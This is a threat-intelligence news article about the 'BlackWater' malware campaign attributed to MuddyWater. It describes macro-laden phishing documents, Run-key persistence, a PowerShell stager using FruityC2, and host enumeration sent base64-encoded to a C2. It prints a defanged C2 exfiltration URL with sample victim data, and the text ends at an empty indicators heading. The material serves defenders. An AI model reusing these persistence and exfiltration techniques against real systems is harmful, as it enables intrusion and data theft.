Researchers discovered a “Blackwater” malware campaign that suspected to associated with well known MuddyWater APT bypass the security control and install a backdoor on Victims PC using MuddyWater’s tactics, techniques, and procedures (TTPs).
MuddyWater involved with a various cyber attack in recent past and its spotted to targeting organizations in Pakistan, Turkey, and Tajikistan using multiple social engineering methods to trick the victims into enabling macros and activate payloads.
Blackwater campaign believed to be a new arsenal of MuddyWater APT since the activities indicate that the threat actors applied many tactics within it to improve its operational security and avoid endpoint detection.
Threat actors using Obfuscated VBA script to establish the persistence mechanism and the VBA script triggered a PowerShell stager, also its a type of method to masquerade as a red-teaming tool.
Backwater also employed a FruityC2 agent script, an open-source framework on GitHub by letting PowerShell stager communicate with C2 server to enumerate the host machine further.
It is one of the methods threat actors employed to make host-based detection more difficult and avoid signature-based detection from Yara rules.
BlackWater Infection Process
Researchers discovered a weaponized document which is being sent to victims via phishing emails with the time stamp that indicates that the document created date on April 23.
Once victims open the malicious document, it required the user to enable the Macro titled “BlackWater.bas”
Threat actors also employed an anti-reverse technique by protecting Macro with a password to inaccessible if a user attempted to view the Macro in Visual Basic.
According to Talos Research, “The macro contains a PowerShell script to persist in the “Run” registry key, “KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding”.
The script then called the file “\ProgramData\SysTextEnc.ini” every 300 seconds. The clear text version of the SysTextEnc.ini appears to be a lightweight stager.”
In Blackwater campaign, threat actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file.
Finally PowerShell script Will enumerate the Targeted victims machine to querying following information.
- Operating system’s name (i.e., the name of the machine)
- Operating system’s OS architecture
- Operating system’s caption
- Computer system’s domain
- Computer system’s username
- Computer’s public IP address
Once its enumerate all the information, It proposes the URL post request to a C2 with base64-encoded, whereas in previous versions this information was written to a text file.
Later it decode the enumerated data and obtain the stolen data From Victims
hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*Ð=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUPÐ=.*USER-PC\admin*192.168.000.01
Indicators of compromise